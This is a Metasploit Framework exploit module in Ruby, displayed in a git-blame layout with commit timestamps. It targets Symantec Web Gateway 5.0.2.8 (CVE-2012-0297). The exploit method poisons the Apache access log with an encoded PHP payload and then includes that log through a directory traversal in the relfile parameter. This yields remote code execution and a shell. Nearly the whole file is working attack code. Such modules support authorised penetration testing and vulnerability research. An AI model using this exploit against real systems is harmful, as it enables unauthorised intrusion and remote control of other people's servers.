2012-05-28 03:47:39 +00:00
|
|
|
##
|
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
|
super(update_info(info,
|
2012-06-10 20:38:58 +00:00
|
|
|
'Name' => "Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability",
|
2012-05-28 03:47:39 +00:00
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a vulnerability found in Symantec Web Gateway's HTTP
|
|
|
|
|
service. By injecting PHP code in the access log, it is possible to load it
|
|
|
|
|
with a directory traversal flaw, which allows remote code execution under the
|
2012-05-28 05:51:46 +00:00
|
|
|
context of 'apache'. Please note that it may take up to several minutes to
|
|
|
|
|
retrieve access_log, which is about the amount of time required to see a shell
|
|
|
|
|
back.
|
2012-05-28 03:47:39 +00:00
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'Unknown', #Discovery
|
|
|
|
|
'muts', #PoC
|
|
|
|
|
'sinn3r' #Metasploit
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
['CVE', '2012-0297'],
|
2012-05-29 18:31:20 +00:00
|
|
|
['OSVDB', '82023'],
|
2012-05-28 03:47:39 +00:00
|
|
|
['EDB', '18932'],
|
|
|
|
|
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00']
|
|
|
|
|
],
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'BadChars' => "\x00"
|
|
|
|
|
},
|
|
|
|
|
'DefaultOptions' =>
|
|
|
|
|
{
|
|
|
|
|
'WfsDelay' => 300, #5 minutes
|
|
|
|
|
'DisablePayloadHandler' => 'false',
|
|
|
|
|
'ExitFunction' => "none"
|
|
|
|
|
},
|
|
|
|
|
'Platform' => ['php'],
|
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
2012-07-19 21:43:52 +00:00
|
|
|
['Symantec Web Gateway 5.0.2.8', {}]
|
2012-05-28 03:47:39 +00:00
|
|
|
],
|
|
|
|
|
'Privileged' => false,
|
2012-05-28 06:31:13 +00:00
|
|
|
'DisclosureDate' => "May 17 2012",
|
2012-05-28 03:47:39 +00:00
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
res = send_request_raw({
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => '/spywall/login.php'
|
|
|
|
|
})
|
|
|
|
|
|
2012-05-28 05:51:46 +00:00
|
|
|
if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
|
|
|
|
|
return Exploit::CheckCode::Detected
|
2012-05-28 03:47:39 +00:00
|
|
|
else
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def exploit
|
2012-07-19 21:43:52 +00:00
|
|
|
if check == Exploit::CheckCode::Safe
|
|
|
|
|
print_status("#{rhost}:#{rport} doesn't look like Symantec Web Gateway, will not engage.")
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
2012-05-28 03:47:39 +00:00
|
|
|
peer = "#{rhost}:#{rport}"
|
|
|
|
|
|
|
|
|
|
php = %Q|<?php #{payload.encoded} ?>|
|
|
|
|
|
|
|
|
|
|
# Inject PHP to log
|
|
|
|
|
print_status("#{peer} - Injecting PHP to log...")
|
|
|
|
|
res = send_request_raw({
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => "/#{php}"
|
|
|
|
|
})
|
|
|
|
|
|
|
|
|
|
select(nil, nil, nil, 1)
|
|
|
|
|
|
|
|
|
|
# Use the directory traversal to load the PHP code
|
2012-05-28 05:51:46 +00:00
|
|
|
# access_log takes a long time to retrieve
|
2012-05-28 03:47:39 +00:00
|
|
|
print_status("#{peer} - Loading PHP code..")
|
|
|
|
|
send_request_raw({
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log'
|
|
|
|
|
})
|
|
|
|
|
|
|
|
|
|
print_status("#{peer} - Waiting for a session, may take some time...")
|
|
|
|
|
|
|
|
|
|
select(nil, nil, nil, 1)
|
|
|
|
|
|
|
|
|
|
handler
|
|
|
|
|
end
|
|
|
|
|
end
|
